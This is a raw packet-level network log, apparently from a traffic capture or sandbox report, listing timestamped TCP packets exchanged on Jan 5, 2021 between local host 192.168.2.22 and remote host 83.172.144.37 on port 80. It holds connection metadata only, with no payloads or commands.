                                                                                        Jan 5, 2021 19:05:23.152652025 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.152658939 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.152677059 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.152690887 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.152713060 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.152714014 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.152736902 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.152750015 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.152774096 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.152776003 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.152797937 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.152811050 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.152829885 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.152844906 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.152863979 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.152874947 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.152910948 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.152911901 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.152931929 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.152936935 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.152971983 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.152972937 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.152996063 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.152998924 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153032064 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153033018 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153058052 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153072119 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153100014 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153104067 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153134108 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153135061 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153152943 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153168917 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153187990 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153194904 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153215885 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153232098 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153253078 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153254986 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153280020 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153291941 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153311968 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153316021 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153347969 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153362036 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153378963 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153423071 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153434038 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153474092 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153496981 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153496981 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153528929 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153532982 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153558016 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153585911 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153603077 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153618097 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153629065 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153642893 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153666019 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153691053 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153696060 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153703928 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153728008 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153728962 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153752089 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153769970 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153789997 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153799057 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153821945 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153827906 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153856993 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153863907 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153877974 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153891087 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153912067 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153927088 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153940916 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.153949976 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153975010 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.153984070 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154009104 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154011965 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154046059 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154059887 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154087067 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154090881 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154110909 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154123068 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154146910 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154161930 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154171944 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154186010 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154207945 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154221058 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154242039 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154242992 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154261112 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154262066 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154287100 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154300928 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154324055 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154325962 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154346943 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154365063 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154380083 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154383898 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154407978 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154413939 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154444933 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154459000 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154474974 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154489040 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154524088 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154547930 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154551983 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154584885 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154584885 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154592991 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154611111 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154620886 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154643059 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154649973 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154674053 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154700994 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154702902 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154721022 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154728889 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154735088 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154763937 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154763937 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154789925 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154802084 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154814005 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154825926 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.154855967 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.154870987 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.205758095 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.205986023 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.206541061 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.206572056 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.206619024 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.206653118 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.206667900 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.206676006 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.206691027 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.206693888 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.206717968 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.206742048 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.206763029 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.206768036 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.206785917 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.206794024 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.206799030 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.206825018 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.206840992 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.206856012 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.206864119 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.206892967 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.206914902 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.206923008 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.206937075 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.206942081 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.206973076 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.206990004 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207005978 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207010031 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207041025 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207058907 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207078934 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207081079 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207108974 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207120895 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207138062 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207139015 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207165956 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207180023 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207200050 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207204103 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207231045 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207250118 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207264900 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207267046 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207293987 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207310915 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207325935 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207330942 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207366943 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207370043 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207406044 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207407951 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207436085 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207437992 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207473040 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207478046 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207499981 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207514048 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207536936 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207540989 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207562923 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207581043 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207592964 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207601070 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207638979 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207644939 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207657099 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207681894 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207707882 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207722902 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207746029 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207746983 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207776070 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207799911 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207813025 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207827091 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207839012 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207845926 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207876921 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207881927 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207911968 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207916975 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207953930 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207954884 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.207971096 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.207999945 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208018064 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208048105 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208082914 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208093882 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208100080 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208106041 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208110094 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208127022 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208132982 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208148956 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208159924 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208173990 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208197117 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208211899 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208225012 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208245993 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208261967 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208262920 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208298922 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208302975 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208339930 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208367109 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208384037 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208398104 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208405018 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208405018 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208421946 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208431005 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208467007 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208467960 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208483934 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208493948 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208524942 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208530903 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208549976 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208568096 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208584070 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208609104 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208619118 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208640099 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208683014 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208684921 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208694935 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208723068 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208744049 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208750963 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208787918 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208796024 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208813906 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208832026 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208848953 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208848953 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208889961 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208892107 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208909988 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208923101 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208945990 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208951950 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.208971024 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.208977938 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209017992 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209036112 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209043026 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209049940 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209084988 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209086895 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209112883 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209130049 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209148884 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209151030 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209175110 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209204912 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209211111 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209227085 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209245920 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209250927 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209264994 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209279060 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209290981 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209326982 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209341049 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209352970 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209366083 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209377050 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209387064 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209412098 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209420919 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209451914 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209490061 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209490061 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209516048 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209530115 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209553003 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209553957 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209579945 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209599018 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209605932 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209624052 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209657907 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209662914 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209695101 CET4916780192.168.2.2283.172.144.37
                                                                                        Jan 5, 2021 19:05:23.209700108 CET804916783.172.144.37192.168.2.22
                                                                                        Jan 5, 2021 19:05:23.209723949 CET4916780192.168.2.2283.172.144.37
